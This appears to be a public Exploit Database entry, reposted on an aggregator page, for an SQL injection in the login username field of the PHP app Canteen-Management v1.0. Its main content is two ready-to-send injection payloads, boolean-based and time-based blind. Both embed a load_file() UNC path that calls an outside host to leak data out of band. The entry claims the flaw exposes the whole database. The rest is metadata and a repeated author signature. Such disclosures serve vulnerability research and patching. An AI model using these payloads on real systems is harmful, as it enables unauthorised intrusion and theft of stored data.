Canteen-Management v1.0 – SQL Injection

• Exploit Database
• 12 阅读

• 作者： nu11secur1ty
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51063/

• ## Exploit Title: Canteen-Management v1.0 - SQL Injection
  ## Exploit Author: nu11secur1ty
  ## Date: 10.04.2022
  ## Vendor: https://www.mayurik.com/
  ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
  ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi
  
  ## Description:
  The username parameter from Canteen-Management1.0-2022 appears to be
  vulnerable to SQL injection attacks.
  The malicious user can attack remotely this system by using this
  vulnerability to steal all information from the database of this
  system.
  
  STATUS: HIGH Vulnerability
  
  [+]Payload:
  
  ```mysql
  ---
  Parameter: username (POST)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
  Payload: username=UvIiDwEB'+(select
  load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
  OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: username=UvIiDwEB'+(select
  load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
  AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
  'awEr'='awEr&password=h5F!l8j!Y6&login=
  ---
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)
  
  ## Proof and Exploit:
  [href](https://streamable.com/vvz2lh)
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at
  https://packetstormsecurity.com/https://cve.mitre.org/index.html and
  https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>